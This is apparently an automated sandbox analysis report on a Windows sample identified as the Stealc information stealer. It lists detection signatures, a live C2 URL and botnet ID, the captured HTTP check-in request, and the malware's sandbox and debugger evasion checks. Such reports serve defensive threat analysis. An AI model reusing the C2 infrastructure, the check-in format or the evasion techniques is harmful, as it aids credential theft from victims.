
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538175
MD5: ffb497d86a175802a94beb58ef45bcbf
SHA1: 16e0858579f97e8efaf3adc83eb9c445848f2c81
SHA256: fecb47b6a0108dd26752fed4b29cf8f4d2b8833e07a2b7300e9fbe3047763d4d
Tags: exe, user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 4480 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FFB497D86A175802A94BEB58EF45BCBF)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000003.2029533452.0000000004B60000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 4480 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 4480 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.1b0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-20T18:13:03.918563+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP


AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.1b0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_001BC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001B7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_001B7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001B9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_001B9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001B9B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_001B9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_001C8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_001C38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001C4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_001BDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_001BE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_001BED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_001C4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001BDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_001BBE70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BF68A FindFirstFileA | 0_2_001BF68A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001BF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001BF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_001C3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001B16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_001B16D0

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFID | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 45 46 35 36 43 37 46 41 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a | Data Ascii: ------IIJKJDAFHJDHIEBGCFID | Content-Disposition: form-data; name="hwid" | 49EF56C7FA3C2002295620 | ------IIJKJDAFHJDHIEBGCFID | Content-Disposition: form-data; name="build" | doma | ------IIJKJDAFHJDHIEBGCFID--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (this entry is repeated 7 times in the report)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001B4880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_001B4880
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIJKJDAFHJDHIEBGCFID | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 45 46 35 36 43 37 46 41 33 43 32 30 30 32 32 39 35 36 32 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 4b 4a 44 41 46 48 4a 44 48 49 45 42 47 43 46 49 44 2d 2d 0d 0a | Data Ascii: ------IIJKJDAFHJDHIEBGCFID | Content-Disposition: form-data; name="hwid" | 49EF56C7FA3C2002295620 | ------IIJKJDAFHJDHIEBGCFID | Content-Disposition: form-data; name="build" | doma | ------IIJKJDAFHJDHIEBGCFID--
Source: file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php)
Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpf
Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph
Source: file.exe, 00000000.00000002.2074713980.0000000000F41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpt5b
Source: file.exe, 00000000.00000002.2074713980.0000000000F26000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2074713980.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.378

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698E0 | 0_2_005698E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057E132 | 0_2_0057E132
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0048B1C9 | 0_2_0048B1C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057FA49 | 0_2_0057FA49
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005882E6 | 0_2_005882E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004B0A92 | 0_2_004B0A92
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004EA30C | 0_2_004EA30C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006403A9 | 0_2_006403A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00589C6C | 0_2_00589C6C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057ACE6 | 0_2_0057ACE6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057C499 | 0_2_0057C499
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058158E | 0_2_0058158E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00504ED1 | 0_2_00504ED1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0058EEF1 | 0_2_0058EEF1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00586F58 | 0_2_00586F58
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0060B75D | 0_2_0060B75D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00584FDE | 0_2_00584FDE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00582F8C | 0_2_00582F8C
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 001B45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: qluozxrq ZLIB complexity 0.9947801902823424
Source: file.exe, 00000000.00000002.2069756680.00000000001B1000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2029533452.0000000004B60000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_001C9600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_001C3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\X817RVFQ.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1869824 > 1048576
Source: file.exe | Static PE information: Raw size of qluozxrq is bigger than: 0x100000 < 0x1a2600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.1b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;qluozxrq:EW;pbwitchi:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;qluozxrq:EW;pbwitchi:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_001C9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cc3eb should be: 0x1d340a
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: qluozxrq
Source: file.exe | Static PE information: section name: pbwitchi
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044984E push ecx; mov dword ptr [esp], esi | 0_2_00449858
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0044984E push ecx; mov dword ptr [esp], ebp | 0_2_0044988A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001CB035 push ecx; ret | 0_2_001CB048
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067385B push ecx; mov dword ptr [esp], 0486BBD4h | 0_2_00673981
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0067385B push 509B9511h; mov dword ptr [esp], ebx | 0_2_00673990
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004F1006 push 0A940F00h; mov dword ptr [esp], edx | 0_2_004F1054
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061E02A push 7E1416A2h; mov dword ptr [esp], edi | 0_2_0061E056
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061E02A push ebp; mov dword ptr [esp], 19D6A100h | 0_2_0061E073
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061E02A push 0E2DC856h; mov dword ptr [esp], esi | 0_2_0061E096
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061E83B push edi; mov dword ptr [esp], ecx | 0_2_0061E859
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0061E83B push 2B0D3270h; mov dword ptr [esp], edi | 0_2_0061E8A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005AD8FB push 002C201Ah; mov dword ptr [esp], edi | 0_2_005AD903
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005F08FC push ebp; mov dword ptr [esp], edx | 0_2_005F0954
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006630CB push 018C8F89h; mov dword ptr [esp], edi | 0_2_006639AA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006630CB push ebx; mov dword ptr [esp], ebp | 0_2_006639B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698E0 push 07DE2EC4h; mov dword ptr [esp], ebx | 0_2_00569946
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698E0 push 1AAAEA60h; mov dword ptr [esp], eax | 0_2_005699FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698E0 push eax; mov dword ptr [esp], ebx | 0_2_00569A3D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005698E0 push ebx; mov dword ptr [esp], 1A2BF7F5h | 0_2_00569A98
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005AA092 push 2B0D67A4h; mov dword ptr [esp], ebp | 0_2_005AA17D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006768AE push 74CA9193h; mov dword ptr [esp], esi | 0_2_006768B6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0064796A push 6887B790h; mov dword ptr [esp], edi | 0_2_006479D1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00666933 push esi; mov dword ptr [esp], ebp | 0_2_00666A16
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_005D493E push 677ACDEBh; mov dword ptr [esp], esi | 0_2_005D4962
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057E132 push esi; mov dword ptr [esp], edx | 0_2_0057E168
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057E132 push ecx; mov dword ptr [esp], ebp | 0_2_0057E2A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057E132 push ebp; mov dword ptr [esp], 709674FCh | 0_2_0057E326
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057E132 push edx; mov dword ptr [esp], eax | 0_2_0057E375
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057E132 push ebx; mov dword ptr [esp], 6E7FD838h | 0_2_0057E385
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057E132 push 3494F4F7h; mov dword ptr [esp], eax | 0_2_0057E3DF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0057E132 push 5AC3A65Dh; mov dword ptr [esp], ebp | 0_2_0057E4FA
Source: file.exe | Static PE information: section name: qluozxrq entropy: 7.954062792540728

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_001C9860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13762
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 593E33 second address: 593E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C067h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5931D1 second address: 5931D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5931D7 second address: 5931DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5931DC second address: 5931E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5931E2 second address: 5931FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F239852C069h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 59336C second address: 593387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2398D0345Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F2398D03456h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5934F5 second address: 593523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F239852C067h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F239852C05Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 593523 second address: 593535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2398D0345Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 596AB7 second address: 596ABB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 596ABB second address: 596AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnc 00007F2398D03469h 0x0000000c popad 0x0000000d push eax 0x0000000e push edi 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
